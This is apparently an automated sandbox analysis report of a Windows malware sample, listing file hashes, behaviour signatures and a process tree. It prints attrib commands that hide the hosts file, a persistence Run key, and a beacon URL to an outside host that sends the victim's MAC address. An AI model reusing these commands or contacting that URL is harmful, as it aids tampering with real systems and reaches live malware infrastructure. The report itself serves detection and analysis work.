Analysis

  • max time kernel
    150s
  • max time network
    124s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    11/08/2024, 20:44

General

  • Target

    8be7124a1256617766fcc2fa45f3190b_JaffaCakes118.exe

  • Size

    503KB

  • MD5

    8be7124a1256617766fcc2fa45f3190b

  • SHA1

    3825ab8ee89b8bbfc17429ffee2c55ca6d9f9fe9

  • SHA256

    4ea704d6b372cfe702c23aa22a53203dccc51fe2dd5a39c072c05b51f48a8a31

  • SHA512

    33d5786b0743c0017525a8130428d87a70423658067cb7bdca0841de1126eb2d644dc1409bb3ffe59a4176074d0b560a4516cf5f7933279ea683bf70668834aa

  • SSDEEP

    12288:yBzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz6:Azzzzzzzzzzzzzzzzzzzzzzzzzzzzzzm

Malware Config

Signatures

  • Adds policy Run key to start application 2 TTPs 2 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 29 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3412
      • C:\Users\Admin\AppData\Local\Temp\8be7124a1256617766fcc2fa45f3190b_JaffaCakes118.exe
        "C:\Users\Admin\AppData\Local\Temp\8be7124a1256617766fcc2fa45f3190b_JaffaCakes118.exe"
        2⤵
        • Adds policy Run key to start application
        • Drops file in Drivers directory
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:2792
        • C:\Windows\SysWOW64\attrib.exe
          attrib -s -h "C:\Windows\system32\drivers\etc\hosts"
          3⤵
          • System Location Discovery: System Language Discovery
          • Views/modifies file attributes
          PID:320
        • C:\Windows\SysWOW64\attrib.exe
          attrib +s +h "C:\Windows\system32\drivers\etc\hosts"
          3⤵
          • Sets file to hidden
          • System Location Discovery: System Language Discovery
          • Views/modifies file attributes
          PID:4340
        • C:\program files\internet explorer\iexplore.exe
          "C:\program files\internet explorer\iexplore.exe" "http://www.qqoif.cn/vip/install.asp?ver=081211&tgid=yun10&address=F6-0A-6D-D2-E8-28&regk=1&flag=7bcdc490eabb9c9ee65e4414f903dc02&frandom=5267"
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:4400
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4400 CREDAT:17410 /prefetch:2
            4⤵
            • System Location Discovery: System Language Discovery
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:2996
    • C:\Windows\system32\AUDIODG.EXE
      C:\Windows\system32\AUDIODG.EXE 0x4f0 0x4f8
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1092

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\~DF4E8E65E43FD74121.TMP

    Filesize

    16KB

    MD5

    0a0a8043b43b2e8915423ea7cefe66b1

    SHA1

    8192a20712ad334a7d55f7964e421f506052d24b

    SHA256

    5bc466a368b022ec32466a573a99cc40ee74087a139e1f49b78bce829583591d

    SHA512

    71a57d55799c3b52652d3d78280424c0d62d6643dcc987554b71785cf2a1856dde04638968cc38a48c7f0fef54ca49ee231f182fd558803016a216a7fb7ac99f